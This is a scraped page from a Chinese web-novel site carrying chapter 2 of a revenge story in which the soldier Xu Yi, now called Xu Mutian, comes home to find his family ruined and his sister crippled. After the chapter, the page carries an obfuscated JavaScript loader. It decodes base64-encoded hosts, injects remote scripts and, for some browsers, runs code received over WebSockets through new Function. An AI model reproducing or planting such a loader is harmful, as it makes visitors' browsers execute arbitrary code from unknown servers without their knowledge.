笔趣阁

字:
关灯 护眼
笔趣阁 > 徐逸徐牧天 > 第二章 南边的王,代天牧疆!

第二章 南边的王,代天牧疆!

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
晚八点,华灯初上。
  “汪不仁,这些年辛苦你了。”徐逸看了眼旁边屋子已经入睡的徐灵,平静开口。
  在徐逸对面,汪不仁唯唯诺诺,闷着头说不出话来。
  九年时间,恍然如梦。
  曾经那意气风发的恶少,早已不见嚣张的模样。
  “红叶,让薛一针日夜兼程,赶来巴山郡,二十四小时内,我要见到他。”徐逸微微侧头。
  始终站在徐逸身后的红叶颔首:“喏!”
  气氛,陷入沉默。
  良久,汪不仁鼓起勇气:“徐逸,你这些年,到底去了哪里?”
  徐逸的变化太大了,大到他不敢相信。
  眼前这个戎装染血,眼神深邃如星辰一般的男子,真的是当年那个体弱多病,被他欺负之后却倔强沉默,从不向父辈告状的徐逸?
  徐逸隔窗眺望漆黑如墨的苍穹,古井无波的开口:“去了南疆,有位老人给我起了个新的名字,徐牧天。”
  “新的名字?徐牧天?”
  汪不仁猛的瞳孔收缩,眼珠子似乎要从眼眶里凸出来。
  徐牧天!
  是那个领百人铁骑,奔袭千里,杀得上万境敌溃不成军,围魏救赵夜狼关,迫使三十万大军回防救驾的徐牧天?
  亦或者是一人之力堵一国之门,千军万马无一敢向前一步的徐牧天?
  手染千军血,脚踏万里骨的……徐牧天!
  汪不仁控制不住的颤抖着。
  那是一种发自灵魂,从内心深处生出的颤栗。
  徐逸。
  徐牧天。
  这本该是两个八竿子打不到一块的名字,却汪不仁恍惚的瞳孔里,渐渐重合。
  “你这些年为徐灵所做的一切,我已知晓,你的病虽是顽疾,也能治好。”
  徐逸身躯微微往前倾了些,目光平静:“现在,我答应你一个要求。”
  汪不仁嘴唇颤动,久久无语。
  “不急,想好了再说。”
  徐逸起身,走到隔壁房间,低头看去,心中一痛。
  徐灵没睡,她睁着眼,眸中死灰,没有焦点。
  “小铃铛,睡不着么?哥哥带你出去走走。”
  徐逸说着,将徐灵拦腰抱起。
  轻若无物,却重若千钧。
  二十三岁的大姑娘,不足七十斤……
  徐逸亲自推着轮椅,带徐灵一起上了路边停靠的黑色悍马。
  车身伤痕累累,狰狞而霸气。
  “你就不去了,这是我家的私事。”
  徐逸轻描淡写对汪不仁说了一句,黑色悍马如凶兽一般,在夜色下缓缓驶离。
  汪不仁呆滞良久,返回屋里,颤着双手拿出屏幕有裂纹的手机,点开了新闻直播。
  半小时之后,就该是徐牧天封王的重大新闻。
  ……
  “我们要去的地方,是晨星酒店。”车上,徐逸柔声开口。
  徐灵嘴唇颤了颤。
  九年前,徐逸因不满父亲二婚,愤然离家,从戎南疆。
  不到半年,巴山郡首富徐云曜,从晨星酒店一百零八层,一跃而下。
  也在当晚,徐家千金徐灵,从四楼跌落草地,摔断双腿。
  次日,赵钱孙李周,五家齐至,瓜分徐家偌大家业。
  至此,名门徐家,家破人亡,泯然于众。
  汪家大少汪不仁,因保护徐灵,遭受报复,汪家三十二口,除他之外,尽数命丧黄泉。
  有人不让汪不仁和徐灵死。
  要他们活着,猪狗不如的活着,远比死去更痛苦。
  彼时的徐逸,初改名徐牧天,手握三寸寒铁,战苍茫之军,对巴山郡发生的一切无从知晓。
  直到昨日,九年鏖战,苍茫破胆,国都悬白旗,举国投降,徐逸班师回朝,才知晓这被封锁八年半的消息。
  有人,瞒他。
  今夜的晨星酒店,有一场拍卖会。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};